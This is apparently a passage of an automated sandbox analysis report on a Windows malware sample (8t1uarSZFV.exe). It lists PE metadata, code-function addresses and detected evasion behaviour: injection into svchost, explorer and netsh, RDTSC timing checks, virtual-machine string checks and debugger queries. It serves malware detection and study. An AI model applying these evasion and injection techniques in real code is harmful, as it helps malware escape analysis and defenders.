Source: C:\Windows\explorer.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{50CE75BC-766C-4136-BF5E-9197AA23569E}\InProcServer32
Source: 8t1uarSZFV.exe | Static file information: File size 1118208 > 1048576
Source: 8t1uarSZFV.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: 8t1uarSZFV.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: 8t1uarSZFV.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: 8t1uarSZFV.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: 8t1uarSZFV.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: 8t1uarSZFV.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: 8t1uarSZFV.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: netsh.pdb source: svchost.exe, 00000001.00000003.1763030810.000000000081C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1763924348.0000000000DA0000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 00000001.00000003.1763030810.000000000082C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1763312618.000000000082F000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, netsh.exe, 00000003.00000002.4144354382.0000000001560000.00000040.80000000.00040000.00000000.sdmp
Source: Binary string: wntdll.pdbUGP source: 8t1uarSZFV.exe, 00000000.00000003.1698054336.0000000003980000.00000004.00001000.00020000.00000000.sdmp, 8t1uarSZFV.exe, 00000000.00000003.1695143859.00000000037E0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1764253013.000000000313E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1764253013.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1704028607.0000000000C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1699679609.0000000000A00000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 00000003.00000002.4144443871.000000000371E000.00000040.00001000.00020000.00000000.sdmp, netsh.exe, 00000003.00000003.1765272710.00000000010D6000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 00000003.00000002.4144443871.0000000003580000.00000040.00001000.00020000.00000000.sdmp, netsh.exe, 00000003.00000003.1763738242.0000000000F21000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: netsh.pdbGCTL source: svchost.exe, 00000001.00000003.1763030810.000000000081C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1763924348.0000000000DA0000.00000040.10000000.00040000.00000000.sdmp, svchost.exe, 00000001.00000003.1763030810.000000000082C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1763312618.000000000082F000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 00000003.00000002.4144354382.0000000001560000.00000040.80000000.00040000.00000000.sdmp
Source: Binary string: wntdll.pdb source: 8t1uarSZFV.exe, 00000000.00000003.1698054336.0000000003980000.00000004.00001000.00020000.00000000.sdmp, 8t1uarSZFV.exe, 00000000.00000003.1695143859.00000000037E0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000002.1764253013.000000000313E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1764253013.0000000002FA0000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1704028607.0000000000C00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1699679609.0000000000A00000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, netsh.exe, 00000003.00000002.4144443871.000000000371E000.00000040.00001000.00020000.00000000.sdmp, netsh.exe, 00000003.00000003.1765272710.00000000010D6000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 00000003.00000002.4144443871.0000000003580000.00000040.00001000.00020000.00000000.sdmp, netsh.exe, 00000003.00000003.1763738242.0000000000F21000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: svchost.pdb source: explorer.exe, 00000002.00000002.4160740233.0000000010DBF000.00000004.80000000.00040000.00000000.sdmp, netsh.exe, 00000003.00000002.4143745719.0000000000C35000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 00000003.00000002.4144970692.0000000003ACF000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: svchost.pdbUGP source: explorer.exe, 00000002.00000002.4160740233.0000000010DBF000.00000004.80000000.00040000.00000000.sdmp, netsh.exe, 00000003.00000002.4143745719.0000000000C35000.00000004.00000020.00020000.00000000.sdmp, netsh.exe, 00000003.00000002.4144970692.0000000003ACF000.00000004.10000000.00040000.00000000.sdmp
Source: 8t1uarSZFV.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: 8t1uarSZFV.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: 8t1uarSZFV.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: 8t1uarSZFV.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: 8t1uarSZFV.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: C:\Users\user\Desktop\8t1uarSZFV.exe | Code function: 0_2_00FA42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo, | 0_2_00FA42DE
Source: C:\Users\user\Desktop\8t1uarSZFV.exe | Code function: 0_2_00FC0A76 push ecx; ret | 0_2_00FC0A89
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_004191ED push ecx; iretd | 1_2_004191EE
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0040F365 pushad ; ret | 1_2_0040F36D
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00418389 push esp; iretd | 1_2_0041838B
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_004164DA push edi; retf | 1_2_004164FE
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0041D4F2 push eax; ret | 1_2_0041D4F8
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0041D4FB push eax; ret | 1_2_0041D562
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0041D4A5 push eax; ret | 1_2_0041D4F8
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0041D55C push eax; ret | 1_2_0041D562
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00407726 push esp; iretd | 1_2_00407729
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FA225F pushad ; ret | 1_2_02FA27F9
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FA27FA pushad ; ret | 1_2_02FA27F9
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FA283D push eax; iretd | 1_2_02FA2858
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FD09AD push ecx; mov dword ptr [esp], ecx | 1_2_02FD09B6
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FA1366 push eax; iretd | 1_2_02FA1369
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00ECE9B5 push esp; retn 0000h | 1_2_00ECEAE7
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00ECEB02 push esp; retn 0000h | 1_2_00ECEB03
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00ECEB1E push esp; retn 0000h | 1_2_00ECEB1F
Source: C:\Windows\explorer.exe | Code function: 2_2_0F63AB02 push esp; retn 0000h | 2_2_0F63AB03
Source: C:\Windows\explorer.exe | Code function: 2_2_0F63AB1E push esp; retn 0000h | 2_2_0F63AB1F
Source: C:\Windows\explorer.exe | Code function: 2_2_0F63A9B5 push esp; retn 0000h | 2_2_0F63AAE7
Source: C:\Windows\explorer.exe | Code function: 2_2_0FB819B5 push esp; retn 0000h | 2_2_0FB81AE7
Source: C:\Windows\explorer.exe | Code function: 2_2_0FB81B1E push esp; retn 0000h | 2_2_0FB81B1F
Source: C:\Windows\explorer.exe | Code function: 2_2_0FB81B02 push esp; retn 0000h | 2_2_0FB81B03
Source: C:\Windows\SysWOW64\netsh.exe | Code function: 3_2_01569C4D push ecx; ret | 3_2_01569C60
Source: C:\Windows\SysWOW64\netsh.exe | Code function: 3_2_0358225F pushad ; ret | 3_2_035827F9
Source: C:\Windows\SysWOW64\netsh.exe | Code function: 3_2_035827FA pushad ; ret | 3_2_035827F9
Source: C:\Windows\SysWOW64\netsh.exe | Code function: 3_2_035B09AD push ecx; mov dword ptr [esp], ecx | 3_2_035B09B6
Source: C:\Windows\SysWOW64\netsh.exe | Code function: 3_2_0358283D push eax; iretd | 3_2_03582858
Source: C:\Windows\SysWOW64\netsh.exe | Code function: 3_2_0358135E push eax; iretd | 3_2_03581369
Source: C:\Windows\SysWOW64\netsh.exe | Code function: 3_2_009591ED push ecx; iretd | 3_2_009591EE
Source: C:\Users\user\Desktop\8t1uarSZFV.exe | Code function: 0_2_00FBF98E GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput, | 0_2_00FBF98E
Source: C:\Users\user\Desktop\8t1uarSZFV.exe | Code function: 0_2_01031C41 IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed, | 0_2_01031C41
Source: C:\Users\user\Desktop\8t1uarSZFV.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\8t1uarSZFV.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\netsh.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

          Malware Analysis System Evasion

          Source: C:\Users\user\Desktop\8t1uarSZFV.exeSandbox detection routine: GetForegroundWindow, DecisionNode, Sleepgraph_0-98200
          Source: C:\Users\user\Desktop\8t1uarSZFV.exeAPI/Special instruction interceptor: Address: F03204
          Source: C:\Windows\SysWOW64\svchost.exeAPI/Special instruction interceptor: Address: 7FFE2220D324
          Source: C:\Windows\SysWOW64\svchost.exeAPI/Special instruction interceptor: Address: 7FFE22210774
          Source: C:\Windows\SysWOW64\svchost.exeAPI/Special instruction interceptor: Address: 7FFE22210154
          Source: C:\Windows\SysWOW64\svchost.exeAPI/Special instruction interceptor: Address: 7FFE2220D8A4
          Source: C:\Windows\SysWOW64\svchost.exeAPI/Special instruction interceptor: Address: 7FFE2220DA44
          Source: C:\Windows\SysWOW64\svchost.exeAPI/Special instruction interceptor: Address: 7FFE2220D1E4
          Source: C:\Windows\SysWOW64\netsh.exeAPI/Special instruction interceptor: Address: 7FFE2220D324
          Source: C:\Windows\SysWOW64\netsh.exeAPI/Special instruction interceptor: Address: 7FFE22210774
          Source: C:\Windows\SysWOW64\netsh.exeAPI/Special instruction interceptor: Address: 7FFE2220D944
          Source: C:\Windows\SysWOW64\netsh.exeAPI/Special instruction interceptor: Address: 7FFE2220D504
          Source: C:\Windows\SysWOW64\netsh.exeAPI/Special instruction interceptor: Address: 7FFE2220D544
          Source: C:\Windows\SysWOW64\netsh.exeAPI/Special instruction interceptor: Address: 7FFE2220D1E4
          Source: C:\Windows\SysWOW64\netsh.exeAPI/Special instruction interceptor: Address: 7FFE22210154
          Source: C:\Windows\SysWOW64\netsh.exeAPI/Special instruction interceptor: Address: 7FFE2220D8A4
          Source: C:\Windows\SysWOW64\netsh.exeAPI/Special instruction interceptor: Address: 7FFE2220DA44
          Source: C:\Windows\SysWOW64\svchost.exeRDTSC instruction interceptor: First address: 409904 second address: 40990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\svchost.exeRDTSC instruction interceptor: First address: 409B6E second address: 409B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\netsh.exeRDTSC instruction interceptor: First address: 949904 second address: 94990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\netsh.exeRDTSC instruction interceptor: First address: 949B6E second address: 949B74 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00409AA0 rdtsc 1_2_00409AA0
          Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 3281Jump to behavior
          Source: C:\Windows\explorer.exeWindow / User API: threadDelayed 6650Jump to behavior
          Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 891Jump to behavior
          Source: C:\Windows\explorer.exeWindow / User API: foregroundWindowGot 861Jump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeWindow / User API: threadDelayed 1242Jump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeWindow / User API: threadDelayed 8729Jump to behavior
          Source: C:\Windows\explorer.exeDecision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)
          Source: C:\Users\user\Desktop\8t1uarSZFV.exeAPI coverage: 4.0 %
          Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 2.0 %
          Source: C:\Windows\SysWOW64\netsh.exeAPI coverage: 1.4 %
          Source: C:\Windows\explorer.exe TID: 7648Thread sleep count: 3281 > 30Jump to behavior
          Source: C:\Windows\explorer.exe TID: 7648Thread sleep time: -6562000s >= -30000sJump to behavior
          Source: C:\Windows\explorer.exe TID: 7648Thread sleep count: 6650 > 30Jump to behavior
          Source: C:\Windows\explorer.exe TID: 7648Thread sleep time: -13300000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exe TID: 7504Thread sleep count: 1242 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\netsh.exe TID: 7504Thread sleep time: -2484000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exe TID: 7504Thread sleep count: 8729 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\netsh.exe TID: 7504Thread sleep time: -17458000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\netsh.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\netsh.exeLast function: Thread delayed
Source: C:\Users\user\Desktop\8t1uarSZFV.exe | Code function: 0_2_0100DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose
Source: C:\Users\user\Desktop\8t1uarSZFV.exe | Code function: 0_2_0101698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime
Source: C:\Users\user\Desktop\8t1uarSZFV.exe | Code function: 0_2_010168EE FindFirstFileW,FindClose
Source: C:\Users\user\Desktop\8t1uarSZFV.exe | Code function: 0_2_0100D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\Desktop\8t1uarSZFV.exe | Code function: 0_2_0100D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\Desktop\8t1uarSZFV.exe | Code function: 0_2_0101979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\Desktop\8t1uarSZFV.exe | Code function: 0_2_01019642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
Source: C:\Users\user\Desktop\8t1uarSZFV.exe | Code function: 0_2_01019B2B FindFirstFileW,Sleep,FindNextFileW,FindClose
Source: C:\Users\user\Desktop\8t1uarSZFV.exe | Code function: 0_2_01015C97 FindFirstFileW,FindNextFileW,FindClose
Source: C:\Users\user\Desktop\8t1uarSZFV.exe | Code function: 0_2_00FA42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo
Source: explorer.exe, 00000002.00000002.4152119162.00000000098A8000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: k&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: explorer.exe, 00000002.00000000.1713933761.0000000009815000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: NECVMWar VMware SATA CD00\w
Source: explorer.exe, 00000002.00000002.4147214666.00000000078A0000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#4&224f42ef&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}$
Source: explorer.exe, 00000002.00000002.4152119162.00000000098A8000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\4&1656f219&0&000000
Source: explorer.exe, 00000002.00000002.4143652285.0000000001240000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&0000000}
Source: explorer.exe, 00000002.00000002.4152411562.000000000997A000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: VMware SATA CD00
Source: explorer.exe, 00000002.00000002.4147214666.00000000078AD000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: NXTTAVMWare
Source: explorer.exe, 00000002.00000000.1713933761.0000000009815000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f&0&000000
Source: explorer.exe, 00000002.00000003.3113987697.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3479427968.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4150997601.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3479427968.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1713933761.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.4150997601.00000000097D4000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3113987697.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1713933761.000000000982D000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: explorer.exe, 00000002.00000002.4152411562.000000000997A000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\4&224f42ef&0&000000
Source: explorer.exe, 00000002.00000002.4148832143.0000000007A34000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1711936620.0000000007A34000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000003.3108048542.0000000007A34000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAWen-GBnx
Source: explorer.exe, 00000002.00000002.4150997601.0000000009660000.00000004.00000001.00020000.00000000.sdmp | Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\4&224F42EF&0&000000er
Source: explorer.exe, 00000002.00000002.4143652285.0000000001240000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\4&1656F219&0&000000
Source: explorer.exe, 00000002.00000002.4143652285.0000000001240000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: C:\Windows\SysWOW64\svchost.exe | Process information queried: ProcessInformation
Source: C:\Windows\SysWOW64\svchost.exe | Process queried: DebugPort
Source: C:\Windows\SysWOW64\netsh.exe | Process queried: DebugPort
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_00409AA0 rdtsc
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0040ACE0 LdrLoadDll
Source: C:\Users\user\Desktop\8t1uarSZFV.exe | Code function: 0_2_0101EAA2 BlockInput
Source: C:\Users\user\Desktop\8t1uarSZFV.exe | Code function: 0_2_00FD2622 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter
Source: C:\Users\user\Desktop\8t1uarSZFV.exe | Code function: 0_2_00FA42DE GetVersionExW,GetCurrentProcess,IsWow64Process,LoadLibraryA,GetProcAddress,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo
Source: C:\Users\user\Desktop\8t1uarSZFV.exe | Code function: 0_2_00FC4CE8 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\8t1uarSZFV.exe | Code function: 0_2_00F034D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\8t1uarSZFV.exe | Code function: 0_2_00F03470 mov eax, dword ptr fs:[00000030h]
Source: C:\Users\user\Desktop\8t1uarSZFV.exe | Code function: 0_2_00F01E70 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0300A30B mov eax, dword ptr fs:[00000030h] (3 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FE02E1 mov eax, dword ptr fs:[00000030h] (3 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030A8324 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030A8324 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030A8324 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FDA2C3 mov eax, dword ptr fs:[00000030h] (5 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030A634F mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03052349 mov eax, dword ptr fs:[00000030h] (15 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03078350 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0305035C mov eax, dword ptr fs:[00000030h] (3 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0305035C mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0305035C mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0309A352 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FE02A0 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0307437C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FC826B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FD4260 mov eax, dword ptr fs:[00000030h] (3 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FD6259 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FCA250 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0308C3CD mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030563C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FC823B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030743D4 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0307E3DB mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0307E3DB mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0307E3DB mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030063FF mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FEE3F0 mov eax, dword ptr fs:[00000030h] (3 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FE03E9 mov eax, dword ptr fs:[00000030h] (8 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FD83C0 mov eax, dword ptr fs:[00000030h] (4 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FDA3C0 mov eax, dword ptr fs:[00000030h] (6 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03058243 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03058243 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030A625D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0308A250 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FC8397 mov eax, dword ptr fs:[00000030h] (3 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FF438F mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FCE388 mov eax, dword ptr fs:[00000030h] (3 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03080274 mov eax, dword ptr fs:[00000030h] (12 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0300E284 mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03050283 mov eax, dword ptr fs:[00000030h] (3 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030662A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030662A0 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030662A0 mov eax, dword ptr fs:[00000030h] (4 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_030A62D6 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FCC310 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FF0310 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0307E10E mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0307E10E mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0307E10E mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0307E10E mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0307E10E mov eax, dword ptr fs:[00000030h] (2 occurrences)
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0307E10E mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0307E10E mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0307E10E mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FCC0F0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FD80E9 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_03090115 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_02FCA0E3 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0307A118 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 1_2_0307A118 mov eax, dword ptr fs:[00000030h] (3 occurrences)
